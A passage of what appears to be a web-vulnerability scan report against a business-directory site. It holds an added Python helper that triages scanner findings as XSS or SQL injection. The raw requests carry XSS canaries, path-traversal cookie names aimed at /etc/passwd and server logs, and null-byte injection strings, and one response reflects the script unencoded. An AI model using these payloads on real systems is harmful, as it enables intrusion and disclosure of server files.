select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?'"--></style></script><script>netsparker(0x00056E)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?'"--></style></script><script>netsparker(0x00056E)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?'"--></style></script><script>netsparker(0x00056E)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?'"--></style></script><script>netsparker(0x00056E)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?'"--></style></script><script>netsparker(0x00056E)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?'"--></style></script><script>netsparker(0x00056E)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId 
where prj.project_page_url = 'leadflow/wede00/project.php?'"--></style></script><script>netsparker(0x00056E)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?'"--></style></script><script>netsparker(0x00056E)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?'"--></style></script><script>netsparker(0x00056E)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?'"--></style></script><script>netsparker(0x00056E)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x00056E)</script>/' union select prj.catI' at line 5
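Both /ppc/leadflow entries above were raised by the Cross-site Scripting engine, but the evidence supports more than CWE-79. The 200 response is a bare MySQL error that prints the entire statement, with the request path (and, in the second entry, the query string as well) concatenated straight into the prj.project_page_url = '...' literal of every UNIONed SELECT. That is error-based SQL injection with full query disclosure (CWE-89) on top of an unencoded reflection of the canary. The helper below is an added example, not part of this report or of the insideup.com application: it re-triages a canary response into the weakness classes the body actually supports. The same reflection check applies to the pseudonym POST finding on /communitysignup.html that follows. The canary is the one from the first leadflow entry; the two response bodies are constructed (a shortened imitation of the response above, and a correctly encoded page for contrast), and the non-MySQL error patterns are assumptions added for generality.

```python
"""
Triage helper for canary-based scanner findings (added example, not part of
the Netsparker report or of the insideup.com application).

Given the body returned for a request that carried the scanner canary, it
reports whether the canary came back unencoded (reflected XSS, CWE-79) and
whether a database error message echoing the injected string is present
(error-based SQL injection with query disclosure, CWE-89), so a finding
filed under one class can be re-labelled with both.
"""
import html
import re
from dataclasses import dataclass
from typing import List, Optional

# Canary exactly as sent in the first leadflow request above
# (the scanner's netsparker(...) form, not the alert(...) form in the table).
CANARY = "'\"--></style></script><script>netsparker(0x00055F)</script>"

# Error banners. The MySQL pattern is the text seen in the report; the
# remaining engines are assumptions added so the helper is not MySQL-only.
SQL_ERROR_PATTERNS = {
    "mysql": re.compile(r"You have an error in your SQL syntax", re.I),
    "postgresql": re.compile(r"syntax error at or near", re.I),
    "mssql": re.compile(r"Unclosed quotation mark after the character string", re.I),
    "oracle": re.compile(r"\bORA-\d{5}\b"),
}


@dataclass
class Triage:
    reflected_raw: bool            # canary present byte-for-byte, tags intact
    reflected_encoded: bool        # only an HTML-entity-encoded copy is present
    sql_error_engine: Optional[str]
    leaked_query: Optional[str]    # SQL text echoed ahead of the error banner
    canary_in_query: bool          # injected string landed inside that SQL


def triage_response(body: str, canary: str = CANARY) -> Triage:
    raw = canary in body
    encoded = (not raw) and html.escape(canary, quote=True) in body
    engine, err = None, None
    for name, pattern in SQL_ERROR_PATTERNS.items():
        err = pattern.search(body)
        if err:
            engine = name
            break
    leaked = None
    if err is not None:
        # The echoed statement is everything from the first DML keyword
        # up to the start of the error banner.
        start = re.search(r"(?i)\b(select|insert|update|delete)\b", body[:err.start()])
        if start:
            leaked = body[start.start():err.start()].rstrip()
    return Triage(raw, encoded, engine, leaked, bool(leaked and canary in leaked))


def classify(t: Triage) -> List[str]:
    """Map a Triage to the weakness classes the evidence supports."""
    labels = []
    if t.reflected_raw:
        labels.append("CWE-79 reflected XSS: canary returned unencoded")
    if t.sql_error_engine:
        detail = f"{t.sql_error_engine} error banner"
        if t.canary_in_query:
            detail += ", full statement disclosed with the injected string inside it"
        labels.append(f"CWE-89 SQL injection: {detail}")
    if not labels and t.reflected_encoded:
        labels.append("no finding: canary reflected entity-encoded only")
    return labels


# Constructed body modelled on, and far shorter than, the leadflow response
# above: the page prints the statement it tried to run, with the request
# path concatenated into the string literal, followed by the MySQL error.
SAMPLE_LEADFLOW_BODY = (
    "select prj.catId,prj.project_page_url from lead_flow_one_pages_details prj "
    "where prj.project_page_url = 'leadflow/phsy00/" + CANARY + "' "
    "OR prj.project_page_url = 'leadflow/phsy00/" + CANARY + "/'"
    "You have an error in your SQL syntax; check the manual that corresponds to "
    "your MySQL server version for the right syntax to use near "
    "'></style></script><script>netsparker(0x00055F)</script>/' at line 1"
)

# Constructed body showing what a fixed page should return for the same
# canary: entity-encoded inside an attribute value, no SQL text echoed.
SAMPLE_SAFE_BODY = (
    '<input type="text" name="pseudonym" value="'
    + html.escape(CANARY, quote=True) + '" />'
)

if __name__ == "__main__":
    for label, body in (("leadflow", SAMPLE_LEADFLOW_BODY), ("fixed", SAMPLE_SAFE_BODY)):
        print(label, classify(triage_response(body)))
```

Running the module prints the labels for both constructed bodies. When re-checking a real finding, feed triage_response the captured body and the exact canary the scanner sent (the netsparker(...) string in the Request section, not the alert(...) form the Parameters table shows), otherwise the raw-reflection check misses.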
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter                 Type   Value
companyName               POST   Smith
emailAddress              POST   netsparker@example.com
firstName                 POST   Smith
lastName                  POST   Smith
password1                 POST   3
password2                 POST   3
pseudonym                 POST   '"--></style></script><script>alert(0x000572)</script>
receiveSpecialOfferEmail  POST   netsparker@example.com
refererUrl                POST   http://www.insideup.com/index.html
termsOfService            POST   3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 327
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName=Smith&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&password1=3&password2=3&pseudonym='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000572)%3c%2fscript%3e&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:58 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=DA2D9A18BCD9550A8B0BD487D620B406; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { 
document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" 
action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="'"--></style></script><script>netsparker(0x000572)</script>" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 formError" /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailA..
- /ppc/leadflow/phsy00/project.php

/ppc/leadflow/phsy00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='%22--%3E%3C..

Parameters

Parameter Type Value
catId GET 110009
iusrc GET iupsc
nsextt GET '"--></style></script><script>alert(0x000575)</script>

Request

GET /ppc/leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000575)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
